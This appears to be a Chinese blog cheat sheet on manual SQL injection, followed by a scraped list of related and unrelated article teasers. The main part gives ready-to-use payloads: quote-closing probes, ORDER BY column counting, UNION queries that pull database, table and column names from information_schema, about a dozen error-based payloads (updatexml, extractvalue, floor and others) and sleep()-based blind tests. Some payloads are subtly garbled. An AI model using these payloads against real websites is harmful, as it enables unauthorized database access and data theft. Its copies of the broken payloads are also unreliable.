1.基于报错与union的注入

注意:union联合查询注入一般要配合其他注入使用

A.判断是否存在注入,注入是字符型还是数字型,有没过滤了关键字,可否绕过

a.如何判断是否存在注入

一般有一下几种

or 1=1--+

'or 1=1--+

"or 1=1--+

)or 1=1--+

')or 1=1--+

") or 1=1--+

"))or 1=1--+

既把前面的引号或括号进行补全,后要保证格式的正确,让我们的语句可以顺利执行。

B.SQL查询语句中的字段数

order by 数字 --+

C.确定显示位,要用错误的数据,如?id=-1

union select 1,2,3--+

此处要注意,字段数要一致

D.获取当前数据库

获取库名:union select 1,database(),3

E.获取数据库中的表

获取表名:union select 1,(select table_name from information_schema.tables where table_schema='库名' limit 0,1),3

F.获取数据表中的字段名

获取字段名:union select 1,(select column_name from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1),3

G.下载数据

2.盲注(返回结果只有 true 和 false).

A.判断是否存在注入,注入是字符型还是数字型,有没过滤了关键字,可否绕过

B.依次猜测库名、表名、字段名的长度

C.依次猜测库名、表名、字段名,可使用burp得intruder模块

(orderby盲注 ).

3.报错注入(十二种)

A.floor()

id=1 and (select 1 from (select count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by x)a)--+

B.extractvalue()

id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))--+

C.updatexml()

id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+

D.geometrycollection()

id=1 and geometrycollection((select * from(select * from(select user())a)b))--+

E.multipoint()

id=1 and multipoint((select * from(select * from(select user())a)b))--+

F.polygon()

id=1 and polygon((select * from(select * from(select user())a)b))--+

G.multipolygon()

id=1 and multipolygon((select * from(select * from(select user())a)b))--+

H.linestring()

id=1 and linestring((select * from(select * from(select user())a)b))--+

I.multilinestring()

id=1 and multilinestring((select * from(select * from(select user())a)b))--+

J.exp()

id=1 and exp(~(select * from(select user())a))--+

K.NAME_CONST

and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)--+

L.GeometryCollection()

and GeometryCollection(()select *from(select user () )a)b )--+

3.时间注入(类似盲注)

A.判断库名长度

and if(length(database()>=1),sleep(5),1)--+

B.判断库名

and if(substr(database(),1,1)='s',sleep(5),1)--+

注意:时间注入和盲注,可能需使用burp的intruder模块

总结:SQL注入其实就是将自己的sql语句拼接到网页的php程序中,利用程序的设计漏洞,获取数据库的内容

手动SQL注入总结的更多相关文章

  1. 手动SQL注入原理分析与实践

    代码仓库 本文所用代码的代码库地址: 点击这里前往Github仓库 了解SQL注入 定义 SQL注入攻击(SQL Injection),简称注入攻击,是Web开发中最常见的一种安全漏洞.可以用它来从数 ...

  2. 记一次手动SQL注入

    1.检测到可能存在注入漏洞的url 最常用的 ' ,and 1=1 ,and 1=2 http://www.xxx.com/subcat.php?id=1 2.判断字段个数 http://www.xx ...

  3. kali linux之手动漏洞挖掘三(sql注入)

    服务器端程序将用户输入作为参数作为查询条件,直接拼写sql语句,并将结果返回给客户端浏览器 如判断登录 select * from users where user='uname' and passw ...

  4. Java防止SQL注入2(通过filter过滤器功能进行拦截)

    首先说明一点,这个过滤器拦截其实是不靠谱的,比如说我的一篇文章是介绍sql注入的,或者评论的内容是有关sql的,那会过滤掉:且如果每个页面都经过这个过滤器,那么效率也是非常低的. 如果是要SQL注入拦 ...

  5. mybatis中#{}与${}的差别(如何防止sql注入)

    默认情况下,使用#{}语法,MyBatis会产生PreparedStatement语句中,并且安全的设置PreparedStatement参数,这个过程中MyBatis会进行必要的安全检查和转义. # ...

  6. SQL注入攻防入门详解

    =============安全性篇目录============== 本文转载 毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机 ...

  7. 用java PreparedStatement就不用担心sql注入了吗?

    先感慨下,好久没写博客了,一是工作太忙,二是身体不太给力,好在终于查清病因了,趁着今天闲下来,迫不及待与读者交流,最后忠告一句:身体是活着的本钱! 言归正传,对java有了解的同学基本上都体验过JDB ...

  8. sqlmap和burpsuite绕过csrf token进行SQL注入检测

    利用sqlmap和burpsuite绕过csrf token进行SQL注入 转载请注明来源:http://www.cnblogs.com/phoenix--/archive/2013/04/12/30 ...

  9. MyBatis怎么防止SQL注入

    SQL注入是一种代码注入技术,用于攻击数据驱动的应用,恶意的SQL语句被插入到执行的实体字段中(例如,为了转储数据库内容给攻击者).[摘自] SQL injection - Wikipedia SQL ...

随机推荐

  1. Elasticsearch源码解析:环境搭建

    在之前学习Redis的过程中,我就是一边通过文档/视频学习,一边阅读源码.我发现两种方法可以相辅相成,互相补充.阅读文档可以帮助我们快速了解某个功能,阅读源码有助于我们更深入的理解这一功能的实现及思想 ...

  2. 05 ES6模块化规范基础详解

    ES6模块规范 1.1 ES6规范说明 历史上,JavaScript 一直没有模块(module)体系,无法将一个大程序拆分成互相依赖的小文件,再用简单的方法拼装起来.其他语言都有这项功能,比如 Ru ...

  3. Teambition如何使用二次验证码/虚拟MFA/两步验证/谷歌验证器?

    一般点账户名——设置——安全设置中开通虚拟MFA两步验证 具体步骤见链接  Teambition如何使用二次验证码/虚拟MFA/两步验证/谷歌验证器? 二次验证码小程序于谷歌身份验证器APP的优势 1 ...

  4. Netty 学习笔记(1) ------ Hello World

    服务端启动流程 package com.example.netty; import com.example.netty.handler.HelloServerHandler; import io.ne ...

  5. 给隔壁的妹子讲『一个SQL语句是如何执行的?』

    前言 SQL作为Web开发是永远离开不的一个话题,天天写SQL,可是你知道一个SQL是如何执行的吗? select name from user where id = 1; 上面是一个简单的查询语句, ...

  6. 跟老刘学运维day02~部署虚拟环境安装Linux系统(1)

    第1章 部署虚拟环境安装Linux系统 所谓“工欲善其事,必先利其器” 1.准备工具 VmwareWorkStation  15.5——虚拟机软件(必需) RedHatEnterpriseLinux ...

  7. scp的使用以及cp的对比

    scp是secure copy的简写,用于在Linux下进行远程拷贝文件的命令,和它类似的命令有cp,不过cp只是在本机进行拷贝不能跨服务器,而且scp传输是加密的.可能会稍微影响一下速度.当你服务器 ...

  8. 富文本数据 解析HTML

    后台返回给前端的富文本数据如: { "status": 1, "info": "获取活动数据成功", "data": [ ...

  9. It还是高薪行业不?—软件测试

    It还是高薪行业不?—软件测试 谁都希望拿高薪,但是并不是所有人.所有地方都能的:甚者培训出来还不能就业的大有人在,也不是所有人都适合培训后就业(年龄.学历.专业.期望就业地点.不同行业转行还是有很大 ...

  10. 让内层浮动的Div将外层Div撑开 -----清浮动

    清浮动的好处写多了都能体会到,解决高度塌陷, 一般情况下是要清除浮动的,不然会影响下面标签的排版. <div class="parent" style="width ...